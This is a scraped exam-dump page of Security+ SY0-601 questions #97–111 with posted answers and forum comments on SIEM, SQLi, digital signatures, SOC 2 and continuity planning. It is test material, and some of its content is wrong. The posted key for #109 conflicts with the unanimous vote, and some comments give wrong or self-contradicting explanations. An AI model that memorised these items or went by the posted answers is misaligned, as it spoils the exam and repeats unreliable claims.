Which of the following should be monitored by threat intelligence researchers who search for leaked credentials?

A. Common Weakness Enumeration

B. OSINT

C. Dark web

D. Vulnerability databases

Correct Answer: C

Community vote distribution


C (100%)

  scarceanimal 14 hours, 8 minutes ago


Selected Answer: C
C wouldn't help too much at all really, but its the best choice lol.
upvoted 1 times

  hieptran 3 weeks, 3 days ago


Selected Answer: C
C fo sho
upvoted 1 times

  Arcd3746 2 months ago


Selected Answer: C
There's no better choice
upvoted 1 times

  Mewchan 4 months, 3 weeks ago


Selected Answer: C
Darkweb
https://www.hackers-arise.com/post/open-source-intelligence-osint-finding-breached-email-addresses-passwords-and-other-credentials
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 173/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #98 Topic 1

A security analyst needs to be able to search and correlate logs from multiple sources in a single tool. Which of the following would BEST allow a
security analyst to have this ability?

A. SOAR

B. SIEM

C. Log collectors

D. Network-attached storage

Correct Answer: B

Community vote distribution


B (100%)

  Gravoc Highly Voted  4 months, 2 weeks ago


Every single time I've seen the word correlate in questions, the answer has always been SIEM.

From google:

SIEM event correlation is an essential part of any SIEM solution. It aggregates and analyzes log data from across your network applications,
systems, and devices, making it possible to discover security threats and malicious patterns of behaviors that otherwise go unnoticed and can
lead to compromise or data loss.
upvoted 10 times

  RonWonkers Highly Voted  4 months, 3 weeks ago


Selected Answer: B
I believe it is SIEM
upvoted 5 times

  DALLASCOWBOYS 5 days, 19 hours ago


Most Recent 
B. SIEM. This describes exactly what a SIEM does and is.
upvoted 1 times

  rhocale 1 month, 3 weeks ago


this would not be SOAR just bc they dont want security prevention or automation correct? someone explain why not SOAR.
upvoted 1 times

  Yebby 2 months ago


SIEM - Security Information and Event Management
upvoted 2 times

  Knowledge33 3 months, 1 week ago


Selected Answer: B
Log collectors are pieces of software that function to gather data from multiple independent sources and feed it into a unified source such as a
SIEM. Log collectors only collects the logs. SIEM store all logs
upvoted 3 times

  Fitzd 4 months, 3 weeks ago


SIEM has log repository and analysis capabilities that SOAR platforms typically do not. The SOAR has response capabilities that the SIEM does
not
upvoted 3 times

  scarceanimal 14 hours, 5 minutes ago


yep they're commonly used in conjunction for that reason.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 174/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #99 Topic 1

A security analyst is investigating suspicious traffic on the web server located at IP address 10.10.1.1. A search of the WAF logs reveals the
following output:

Which of the following is MOST likely occurring?

A. XSS attack

B. SQLi attack

C. Replay attack

D. XSRF attack

Correct Answer: B

Community vote distribution


B (100%)

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 175/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  comeragh Highly Voted  5 months ago


Selected Answer: B
SQLi - the giveaway is 1=1
upvoted 13 times

  xxxdolorxxx 2 weeks, 1 day ago


You are correct.
upvoted 1 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: B
Answer: SQLi attack

SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access
information that was not intended to be displayed. The giveaway here is the 1=1 in the query which is essentially creating a condition that will
automatically be true.
======================
Helpful Info:
XSS (Cross-Site Scripting) attacks -a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
Replay Attack - a kind of man-in-the-middle attack in which an attacker sniffs messages being sent on a channel to intercept them and resend
them under the cloak of authentic messages.
CSRF (Cross Sit Request Forgery)- attacks that target functionality that causes a state change on the server, such as changing the victim's email
address or password, or purchasing something.
upvoted 7 times

  DALLASCOWBOYS Most Recent  5 days, 19 hours ago


SQLi. Key is the 1=1 is the dead giveaway for the SQL injection attack
upvoted 1 times

  hieptran 3 weeks, 3 days ago


Selected Answer: B
B - Typical SQL Injection payload
upvoted 1 times

  Queenica 2 months, 1 week ago


I selected SQL Injection. However every SQL Statement Query starts with SELECT which is missing. Confused with the wording of the question.
upvoted 1 times

  RonWonkers 4 months, 3 weeks ago


Selected Answer: B
1=1 so its SQLi
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 176/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #100 Topic 1

Which of the following components can be used to consolidate and forward inbound internet traffic to multiple cloud environments though a
single firewall?

A. Transit gateway

B. Cloud hot site

C. Edge computing

D. DNS sinkhole

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
VPC peering relationships can quickly become difficult to manage, especially if each VPC must interconnect in a mesh-like structure. A transit
gateway is a simpler means of managing these interconnections. Essentially, a transit gateway is a virtual router that handles routing between the
subnets in each attached VPC and any attached VPN gateways (aws.amazon.com/transit-gateway).
upvoted 18 times

  Jakalan7 Highly Voted  4 months, 2 weeks ago


Selected Answer: A
A is the only answer that makes sense here.
upvoted 6 times

  ronniehaang Most Recent  4 days, 16 hours ago


Selected Answer: A
a transit gateway is a virtual router that handles routing between the subnets in each attached VPC and any attached VPN gateways
upvoted 1 times

  kameel1221 4 days, 22 hours ago


Hardest Question in Ohio
upvoted 1 times

  DALLASCOWBOYS 5 days, 19 hours ago


A. Transit gateway establishes a simple and seamless integration of VPCs and local systems through a centeral hub or cloud router.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 177/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #101 Topic 1

A DBA reports that several production server hard drives were wiped over the weekend. The DBA also reports that several Linux servers were
unavailable due to system files being deleted unexpectedly. A security analyst verified that software was configured to delete data deliberately
from those servers. No backdoors to any servers were found. Which of the following attacks was MOST likely used to cause the data loss?

A. Logic bomb

B. Ransomware

C. Fileless virus

D. Remote access Trojans

E. Rootkit

Correct Answer: A

Community vote distribution


A (86%) 10%

  stoneface Highly Voted  5 months ago


Selected Answer: A
"software was configured to delete data deliberately from those servers"

This could be achieved by a cronjob


upvoted 16 times

  DALLASCOWBOYS Most Recent  5 days, 19 hours ago


A. Logic bomb would suggest software was configured to be deleted data deliberately from the servers.
upvoted 1 times

  Nirmalabhi 2 months ago


its a trap.I also first thought it was rootkit. but i ll go with logic bomb. Although no conditions specified, Q says it happened over weekend which
means the software was configured to delete data automatically over the weekend.
upvoted 2 times

  Conejo_Negro 2 months ago


Selected Answer: C
I believe the answer is C Fileless virus. Rootkits usually require a back door..question states no back door found..there no pattern or condition
stated in the question..the “software was configured to delete data from those servers “ Fileless attacks usually attaches itself to legitimate
software. https://www.trellix.com/en-us/security-awareness/ransomware/what-is-fileless-malware.html
upvoted 2 times

  Sandon 2 weeks ago


That ain't it
upvoted 1 times

  tek7ila 2 months ago


Selected Answer: E
I also sway to the ROOTKIT. "no BACKDOOR was found" <---- rootkit hides its presence that why no backdoor was found.

The term ROOTKIT derives from UNIX/Linux where any process running as root has unrestricted access to everything from the root of the file
system down.
upvoted 1 times

  Sandon 2 weeks ago


That ain't it
upvoted 1 times

  Jossie_C 3 months ago


Key word is deliberately, i.e., intentionally. It's a trap
upvoted 1 times

  EDSAL 4 months, 3 weeks ago


A Logic bomb
upvoted 1 times

  gen2dee 4 months, 3 weeks ago


"software was configured"

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 178/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 2 times
  WondaByte 4 months, 3 weeks ago
Correct Answer E
Rootkit fits the answer to the question. A condition has to be true for Logic Bomb to occur which in this case isn't there. Correct Answer E
upvoted 3 times

  Orean 3 months ago


The condition could be time-based, meaning the logic bomb might have been set to activate at a specified date and time—such as the
weekend of the data wipe.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Hey everyone, this is NOT the right answer.
upvoted 2 times

  Halaa 4 months, 3 weeks ago


But no BACKDOOR was found.
upvoted 4 times

  Boogie_79 5 months ago


Selected Answer: A
Its simply LOGIC
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 179/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #102 Topic 1

Digital signatures use asymmetric encryption. This means the message is encrypted with:

A. the sender's private key and decrypted with the sender's public key.

B. the sender's public key and decrypted with the sender's private key.

C. the sender's private key and decrypted with the recipient's public key.

D. the sender's public key and decrypted with the recipient's private key.

Correct Answer: A

Community vote distribution


A (86%) 14%

  stoneface Highly Voted  5 months ago


In order to verify the authenticity of a digital signature we need to encrypt the initial message with the sender's private key.
The receiver then can verify the authenticity by decrypting the message with the sender's public key.

https://docs.huihoo.com/globus/gt4-tutorial/ch09s03.html
upvoted 20 times

  Knowledge33 Highly Voted  3 months, 1 week ago


Selected Answer: A
There are 2 general ways to use asymetric algorithm.
1 - For communication between 2 hosts: If bob sends a message to Alice, bob uses Alice's public key to encrypt the message, and Alice uses
her private key to decrypt the message.
2 - For digital signature/Authentication: If ALice need to authenticate Bob, BOB uses his private key to sign the message, and Alice uses the
public key of bob to decrypt the message. This process help to make sure the signature is owned by Bob.
On this example, A is totally correct.
upvoted 10 times

  scarceanimal 13 hours, 45 minutes ago


I NEVER KNEW THIS wow ty
upvoted 1 times

  DALLASCOWBOYS Most Recent  5 days, 19 hours ago


A. If the sender wants to digitally sign a message(Bob), Bob encrypts the message using his private key. When the recipient(Judy) receives the
digitally signed message, Judy decrypts the digital signature using Bob's public key.
upvoted 1 times

  carpathia 2 months, 1 week ago


Selected Answer: A
This question is wonky. They mention 'message encryption' which is encrypt with recepient's public certificate (key) and decrypt with recepient's
private key (cert). Instead encryption they should have written SIGN. But I am guessing is A as in sign an email.
upvoted 1 times

  Queenica 2 months, 1 week ago


Assymetric Key
My PRIVATE KEY is MINE. Not Shared with anyone.
Message I encrypt with MY PRIVATE KEY.
I send MY PUBLIC KEY to You.
Message reaches you You Decrypt with MY PUBLIC KEY.
upvoted 5 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: A
digital signatures are used to verify authenticity and non-repudiation, as only the real sender would have the private key. Everybody with the
senders public key could decrypt the message and therefore validate that it really comes from the original sender
upvoted 1 times

  deeden 4 months, 2 weeks ago


Selected Answer: A
https://cheapsslsecurity.com/blog/wp-content/uploads/2018/09/how-do-digital-signatures-and-digital-certificates-work-together-in-ssl.png
upvoted 1 times

  mark9999 4 months, 2 weeks ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 180/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Be careful here. They are asking about digital signatures - so the sender signs with the private key and it's validated by the senders public key.
This is answer A but they've replaced sign and hash with encrypt and decrypt, which is really confusing.
upvoted 3 times

  EDSAL 4 months, 3 weeks ago


A is the answer
upvoted 1 times

  ksave 4 months, 3 weeks ago


Selected Answer: A
Confusing question. Digital signature provides integrity (by creating hash) and not confidentiality. Then the question asks about encryption.
Choosing answer A as it is the only reasonable answer for digital signature process.
upvoted 3 times

  Halaa 4 months, 3 weeks ago


Selected Answer: A
an asymmetric key system encrypts using a public key and decrypts with a private key. For digital signatures, however, the reverse is true. The
signature is encrypted using the private key and decrypted with the public key.
upvoted 4 times

  Sandon 2 weeks ago


This is why I was confused
upvoted 1 times

  hazeleyes 4 months, 3 weeks ago


Selected Answer: A
This is defintely A. To those saying D I have a simple question for you: sender's public key and recipient's private key isn't even the same key
pair, how can you decrypt it?
upvoted 2 times

  Ay_ma 4 months, 4 weeks ago


Selected Answer: D
Asymmetric Encryption example:

Pretend you’re a spy agency and you need to devise a mechanism for your agents to report in securely. You don’t need two-way communication,
they have their orders, you just need regular detailed reports coming in from them. Asymmetric encryption would allow you to create public keys
for the agents to encrypt their information and a private key back at headquarters that is the only way to decrypt it all. This provides an
impenetrable form of one-way communication.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


but the sender encrypts with their private key
upvoted 1 times

  okay123 5 months ago


Digital signatures work through public key cryptography's two mutually authenticating cryptographic keys. The individual who creates the digital
signature uses a private key to encrypt signature-related data, while the only way to decrypt that data is with the signer's public key.

https://www.techtarget.com/searchsecurity/definition/asymmetric-
cryptography#:~:text=Asymmetric%20encryption%20uses%20a%20mathematically,key%20is%20used%20for%20decryption.

I was also confused until i read signature. Good question! :)


upvoted 1 times

  varun0 5 months ago


Selected Answer: A
It's a digital signature, people in the comments who are saying D have it confused with asymmetric encryption.
upvoted 3 times

  DUCKDOG 5 months ago


Selected Answer: A
Obviously A. I agree with stoneface.

http://guides.brucejmack.net/SOA-Patterns/WSSP/13.1PublicKeyEncryptDigSigDoc.htm
upvoted 3 times

  kiosk99 5 months ago


Selected Answer: A
Answer is A as reference to the link provided by stoneface. Don't get confused with secure conversation vs digital signature. One is to ensure
confidentiality while the other is Non-repudiation.

Definitely not D because even for secure conversation you encrypt with recipient's(not sender) public key and the recipient decrypt with their
private key
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 181/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  kiosk99 5 months ago


Refer to #105
upvoted 1 times

Question #103 Topic 1

A security engineer was assigned to implement a solution to prevent attackers from gaining access by pretending to be authorized users. Which
of the following technologies meets the requirement?

A. SSO

B. IDS

C. MFA

D. TPM

Correct Answer: C

Community vote distribution


C (100%)

  DALLASCOWBOYS 5 days, 19 hours ago


C. Multifactor authentication.
upvoted 1 times

  comeragh 5 months ago


Selected Answer: C
C - Multi Factor Authentication (MFA)
upvoted 3 times

  Josh_Feng 5 months ago


Selected Answer: C
C is correct since MFA = harder to impersonate due to having multifactor authentication.
upvoted 3 times

  Papee 3 months, 2 weeks ago


is MFA a technology ?
upvoted 1 times

  EubertT 2 months, 3 weeks ago


YEs MFA is a technology. Multifactor authentication (MFA) is a security technology that requires multiple methods of authentication from
independent categories of credentials to verify a user's identity for a login or other transaction.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 182/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #104 Topic 1

The Chief Information Security Officer (CISO) has requested that a third-party vendor provide supporting documents that show proper controls are
in place to protect customer data. Which of the following would be BEST for the third-party vendor to provide to the CISO?

A. GDPR compliance attestation

B. Cloud Security Alliance materials

C. SOC 2 Type 2 report

D. NIST RMF workbooks

Correct Answer: C

Community vote distribution


C (86%) 14%

  redsidemanc2 Highly Voted  4 months, 4 weeks ago


Selected Answer: C
GDPR related to EU nothing in question to say they are in EU.

SOC type 2 : tests security controls in place


upvoted 5 times

  ScottT 4 months, 3 weeks ago


https://www.itgovernance.co.uk/soc-reporting
upvoted 1 times

  DALLASCOWBOYS Most Recent  5 days, 19 hours ago


C. In the SOC 2 Type report, the auditor confirms that the controls are functioning properly.
upvoted 1 times

  Nirmalabhi 2 months ago


Do not overthink. The question is simply on auditing.. note the words in the question. "...has requested that a third-party vendor provide
supporting documents." Hence the correct answer is indeed SOC 2. See below directly from Professer messer notes:

If your organization has undergone an audit, then you’re probably familiar with the SSAE SOC 2 types I and II. This is from the American Institute
of Certified Public Accountants, or the AICPA. It’s an auditing standard called the Statement on Standards for Attestation Engagements number
18, or SSAE 18. During these audits, there’s a series of reports that are created, and the name for the suite of reports that are associated with
trust services criteria, or security controls, is the SOC 2, that’s the System and Organization Controls number two. This audit focuses on topics
that can include firewalls, intrusion prevention, or intrusion detection, or multi-factor authentication.
upvoted 3 times

  atrax 2 months, 3 weeks ago


Selected Answer: C
I work in GRC and third party vendonrs provides a soc2 report. GDPR is almost a law where they stated they compliance, but its never
audited/certified
upvoted 1 times

  Knowledge33 2 months, 3 weeks ago


Selected Answer: A
The SOC 2 is a separate report that focuses on controls at a service provider relevant to security, availability, processing integrity, confidentiality,
and privacy of a system. GDPR is the unique possible response, even though It's only applied in EU. The other responses are not related to client
data.
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


GDPR only applies when the entity operates or collects data in any EU country. This question doesn't specify if the personal information in
question belongs to an EU member country. Therefore, we can eliminate option A. If the question stated anything at all about Europe, it would be
A. Since it didn't, It's SOC 2 Type 2 is the correct answer.

It's basically a modernized security audit that occurs usually at a minimum of every 6 months. A 3rd party supplying the results from its internal
SOC 2 Type 2 audit would provide the required supporting documents to satisfy the CISO.
upvoted 2 times

  stoneface 5 months, 1 week ago


I am split between SOC Type 2 and GDPR compliance ->
SOC Type 2 -> A SOC 2 Type 2 report is an internal controls report capturing how a company safeguards customer data and how well those
controls are operating. Companies that use cloud service providers use SOC 2 reports to assess and address the risks associated with third
party technology services.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 183/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

GDPR Compliance Attestations -> ATC 315 also helps mature your internal controls over GDPR compliance and can help you manage GDPR
compliance risk beyond what internal risk assessments and audits provide. ATC 315 can identify deficiencies in internal controls, pinpoint areas
for improvement, and will strengthen your organization’s GDPR compliance posture.

It seems that SOC Type 2 Report better matches the requirement.

I listen to you ...


upvoted 4 times

  andrizo 3 months, 3 weeks ago


gdpr only applies to collection of consumer data in europe
upvoted 1 times

  KetReeb 5 months ago


SOC Type 2 Report would verify that the vendor is an organization that maintains a high level of information security.
upvoted 1 times

Question #105 Topic 1

Which of the following is assured when a user signs an email using a private key?

A. Non-repudiation

B. Confidentiality

C. Availability

D. Authentication

Correct Answer: A

Community vote distribution


A (100%)

  IQ30 Highly Voted  5 months ago


Selected Answer: A
Professor Messer notes
• Non-Repudiation
– Confirm the authenticity of data
– Digital signature provides both integrity
and non-repudiation
upvoted 9 times

  DALLASCOWBOYS Most Recent  5 days, 19 hours ago


A. Non-repudiation. It is a concept that the sender cannot deny that they sent the message.
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Non Repudiation is your virtual John Hancock. It's a way of virtually stamping any data or document with "I am who I say I am". Only way to
break this would be if the private key owners' private key became compromised. Which at that point you got bigger problems than Non
Repudiation.
upvoted 3 times

  Gino_Slim 3 months, 1 week ago


"John Hancock" is another way of saying "signature" for those that don't know
upvoted 2 times

  EDSAL 4 months, 3 weeks ago


A- Non Repudation confirms that the signature comes from what it sayst it comes
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 184/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #106 Topic 1

A systems administrator is troubleshooting a server's connection to an internal web server. The administrator needs to determine the correct ports
to use. Which of the following tools BEST shows which ports on the web server are in a listening state?

A. ipconfig

B. ssh

C. ping

D. netstat

Correct Answer: D

Community vote distribution


D (92%) 8%

  Gino_Slim Highly Voted  3 months, 1 week ago


Selected Answer: D
Answer is D

A. ipconfig - Just shows you the IP information for your current machine
B. ssh - this is used for file transfers (ftp etc etc)
C. ping - this is just to reach out to a node to get a response from it

These are simple ways of explaining. Don't come behind me and getting real granular super duper tech people -_-
upvoted 15 times

  scarceanimal 13 hours, 35 minutes ago


thanks gino slim!
upvoted 1 times

  rodwave 2 months, 3 weeks ago


the explanations are perfectly fine
upvoted 3 times

  comeragh Highly Voted  5 months ago


Selected Answer: D
Netstat shows listening ports
upvoted 8 times

  T4IT Most Recent  1 week, 6 days ago


Selected Answer: A
Netstat is correct
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 185/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #107 Topic 1

Which of the following BEST reduces the security risks introduced when running systems that have expired vendor support and lack an immediate
replacement?

A. Implement proper network access restrictions.

B. Initiate a bug bounty program.

C. Classify the system as shadow IT.

D. Increase the frequency of vulnerability scans.

Correct Answer: A

Community vote distribution


A (100%)

  Jakalan7 Highly Voted  4 months, 2 weeks ago


Selected Answer: A
A is the only answer that makes sense here.
upvoted 8 times

  Papee 3 months, 2 weeks ago


I agree. Network segmentation.
upvoted 3 times

  03allen 2 months, 3 weeks ago


I don't think A means network segmentation.
upvoted 1 times

  Ranaer Most Recent  1 week, 3 days ago


Selected Answer: A
We are asked to REDUCE risk.
A. Implement proper network access restrictions. - This more or less reduces risk by limiting who has access to the legacy system.
B. Initiate a bug bounty program. - We dont need that, since its a legacy system, which we havent developed. We most likely cannot patch this
anyway.
C. Classify the system as shadow IT. - Irrelevant to the question.
D. Increase the frequency of vulnerability scans. - As in B, us knowing that issues exist, wont help us much, since we cannot patch the system.
upvoted 1 times

  mick1 1 month, 4 weeks ago


I would say D - as system is not changing role, and in ANY use case, network access should be minimized (or at least planned for system) - so if i
don't want to change device role, just reduce risk, I would go with more scans.
upvoted 1 times

  KingDrew 3 weeks ago


Unfortunately that doesn't reduce the risk, they can still attack, and the scans will only detect that attack not reduce the probability of chance
of it happening. I choose A.
upvoted 1 times

  Jossie_C 3 months ago


Prevent the computer from connecting to the internet where the bad guys are
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 186/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #108 Topic 1

Due to unexpected circumstances, an IT company must vacate its main office, forcing all operations to alternate, off-site locations. Which of the
following will the company MOST likely reference for guidance during this change?

A. The business continuity plan

B. The retention policy

C. The disaster recovery plan

D. The incident response plan

Correct Answer: A

Community vote distribution


A (84%) C (16%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
BCP is to empower an organization to keep crucial functions running during downtime. This, in turn, helps the organization respond quickly to an
interruption, while creating resilient operational protocols.
upvoted 16 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Answer - The business continuity plan

A business continuity is a plan that ensures a company can maintain core operations without interrupts especially in a event of a crisis.

===========================
Retention Policy - determines how long business a record/resource is stored and how to dispose of the record when it is time to do so.

Disaster Recovery - A set of instructions created by an organization on how to respond and recover from unplanned incidents. Generally
involving a hardware failure, destruction, etc.

Incident Response - a set of steps a incident response team follows to properly prepare and respond to incidents.
upvoted 5 times

  tebirkishaw Most Recent  2 days, 15 hours ago


Selected Answer: C
It is C. The business continuity plan goes over what you can do in the event you can't access your normal resources, or if things aren't working.
For example if your payment portal is down, you would have something saying you take payments by phone. In this question they have all of
their resources, just working at a different site. Professor Messer's videos on this explain it really well as well.
upvoted 1 times

  tebirkishaw 2 days, 15 hours ago


Actually I had my definitions mixed up lol... I think the answer would be A
upvoted 1 times

  DALLASCOWBOYS 5 days, 19 hours ago


A. Business Continuity Plans focus on keeping an organization functional when misfortune or incidents occur. The reason for the vacating of the
office isn't specified, so there is no way, based on the information provided, that a disaster ( natural or man-made has occurred)
upvoted 1 times

  Sandon 2 weeks ago


Selected Answer: C
ChatGPT says it's C
upvoted 2 times

  xxxdolorxxx 2 weeks, 1 day ago


Selected Answer: A
A seems like the correct answer
upvoted 2 times

  carpathia 2 months, 1 week ago


Selected Answer: A
This should normally be BIA, but BIA is part of BCP, so BCP.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 187/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  DoDaResearch 2 months, 4 weeks ago


Selected Answer: C
See CompTIA Security + study guide page 518
Disaster Recovery plan -- A disaster can be seen as a special class of incident where the organizations primary business function is disrupted.
Disaster recovery requires considerable resources, sush as SHIFTING PROCESSING TO A SECONDARY SITE. Disaster recovery will involve a
wider range of stakeholders than a less serious incidents.
Business Continuity Plan (BCB) -- this identifies how business processes should deal with both minor and disaster-level disruption. During an
incident, a system may need to be isolated. Continuity planing ensures that there is processing redundancy supporting the workflow so that
when a server is taken offline for security remediation, processing can failover to a separate system. If systems do not have this sort of planned
resilience, incident response will be much more disruptive.
upvoted 2 times

  DoDaResearch 2 months, 4 weeks ago


Not all disasters are natural, if a fire marshal closes your building for various reasons that may not even be related to your building, you still
can not enter
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Remember that BCP is all-encompassing, including natural disaster recovery. Since the question did not specify this is a disaster, then BCP is
the only option left that can be correct.
upvoted 1 times

  Yuyuyakuza 4 months, 4 weeks ago


A.BCP no indication of a natural disaster.
upvoted 1 times

  comeragh 5 months ago


Selected Answer: A
Agree with A - BCP
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 188/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #109 Topic 1

While reviewing an alert that shows a malicious request on one web application, a cybersecurity analyst is alerted to a subsequent token reuse
moments later on a different service using the same single sign-on method. Which of the following would BEST detect a malicious actor?

A. Utilizing SIEM correlation engines

B. Deploying Netflow at the network border

C. Disabling session tokens for all sites

D. Deploying a WAF for the web server

Correct Answer: D

Community vote distribution


A (100%)

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 189/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
I think that SIEM correlation would be the best way to detect an attacker in this case.

The initial compromise was a malicious request on a web server. Moments later the token created with SSO was used on another service, the
question does not specify what type of service.

Deploying a WAF on the web server will detect the attacker but only on that server. If the attacker issues the same malicious request to get
another SSO token correlating that event with using that SSO token in other services would allows to detect the malicious activity.

Correct me if I am wrong
upvoted 26 times

  hieptran 3 weeks, 3 days ago


I think the same with you,
The token type could be varies, but I don't think that it will be detected and prevented by WAF or anything since it could be a legitimate
request with stolen/hacked token.
In the context of this question, it is best to collerate logs and find which system is compromised.
upvoted 1 times

  brewoz404sd 1 day, 19 hours ago


Most Recent 
Answer is D. A waf looks specifically at session / token use, as well as monitoring all traffic between web / user. You can deploy a waf to protect
ALL web apps behind it. Answer is clearly D, its exactly what a WAF is designed to do.
upvoted 1 times

  nukimoya 2 months ago


i still think D
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


SIEM correlation dashboards. From google:

"It aggregates and analyzes log data from across your network applications, systems, and devices, making it possible to discover security threats
and malicious patterns of behaviors that otherwise go unnoticed and can lead to compromise or data loss."

Web application firewall is a good candidate, except that it will log both events into separate log files. Which can go unnoticed by security
administrators, and will require additional tools to automate the process of alerting the correlated events together. Such as a SIEM.
upvoted 4 times

  Lars87 4 months, 3 weeks ago


Selected Answer: A
SIEM i think correct
upvoted 1 times

  okay123 5 months ago


The software analyzes the log entries to identify signs of malicious activity. In addition, since the system gathers events from different sources
across the network, it can recreate the timeline of an attack, enabling a company to determine the nature of the attack and its impact on the
business.

https://www.techtarget.com/searchsecurity/definition/security-information-and-event-management-SIEM

I thought D but key word is differint devices.. so SIEM correlation i think


upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 190/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #110 Topic 1

Two organizations plan to collaborate on the evaluation of new SIEM solutions for their respective companies. A combined effort from both
organizations' SOC teams would speed up the effort. Which of the following can be written to document this agreement?

A. MOU

B. ISA

C. SLA

D. NDA

Correct Answer: A

Community vote distribution


A (100%)

  Gravoc Highly Voted  4 months, 2 weeks ago


MOU - Memorandum of Understanding
MOA - Memorandum of Agreement

A MOU is the initialization phase for two companies who plan to work together. It establishes what each company is looking to achieve/get out of
the arrangement. It's not a signed contract.

A MOA is a step above the MOU. It's a signed contract that indicates both parties understand and agree with the terms placed forward by both
parties.
upvoted 13 times

  RonWonkers 4 months, 1 week ago


Thanks for the explanation
upvoted 1 times

  stoneface Highly Voted  5 months ago


Selected Answer: A
A document that regulates security-relevant aspects of an intended connection between an agency and an external system. It regulates the
security interface between any two systems operating under two different distinct authorities. It includes a variety of descriptive, technical,
procedural, and planning information. It is usually preceded by a formal MOA/MOU that defines high- level roles and responsibilities in
management of a cross-domain connection.
upvoted 11 times

  stoneface 5 months ago


Add ISA at the beginning -> source https://csrc.nist.gov/glossary/term/interconnection_security_agreement
upvoted 2 times

  ronniehaang Most Recent  4 days, 15 hours ago


Selected Answer: A
A. MOU (Memorandum of Understanding) is the best option to document the agreement between two organizations to collaborate on the
evaluation of new SIEM solutions.

An MOU is a non-binding agreement between two or more parties outlining the goals and objectives of a project or collaboration. It outlines the
responsibilities, resources, and expectations of each party involved, and serves as a framework for future cooperation and collaboration. In this
case, the MOU between the two organizations would outline the purpose and goals of their collaboration to evaluate new SIEM solutions, the
roles and responsibilities of each organization's SOC team, and any timelines or expectations for the evaluation process.

An MOU is a good option as it provides a clear understanding of the expectations and responsibilities of both organizations without binding
either organization to a specific course of action or committing to a formal agreement.
upvoted 1 times

  DALLASCOWBOYS 5 days, 18 hours ago


A. MOU. It just states they are collaborating, thus not requiring a legal agreement.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 191/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #111 Topic 1

The Chief Information Security Officer wants to prevent exfiltration of sensitive information from employee cell phones when using public USB
power charging stations. Which of the following would be the BEST solution to implement?

A. DLP

B. USB data blocker

C. USB OTG

D. Disabling USB ports

Correct Answer: B

Community vote distribution


B (67%) A (33%)

  FQ Highly Voted  4 months, 3 weeks ago


Selected Answer: A
The question is talking about PUBLIC USB power charging stations, the CISO cannot for sure place USB data blocker on all publich USB ports in
the world !
The CISO also can't disable employees cell phones ports, as these are usually personal properties.
USB OTG is obviously playing the oppostie of what's required if used.

DLP is the answer, and it can be implemented as following:


1. Create a User Group based on AD - (You will need to have a Directory Connection configured)
2. Create a policy that detects the data AND includes a rule for the User Group. - This way it will ONLY work for those users
3. Test to make sure the policy works for ONLY those users.
4. Create a Response rule that BLOCK Endpoint AND only applies to USB
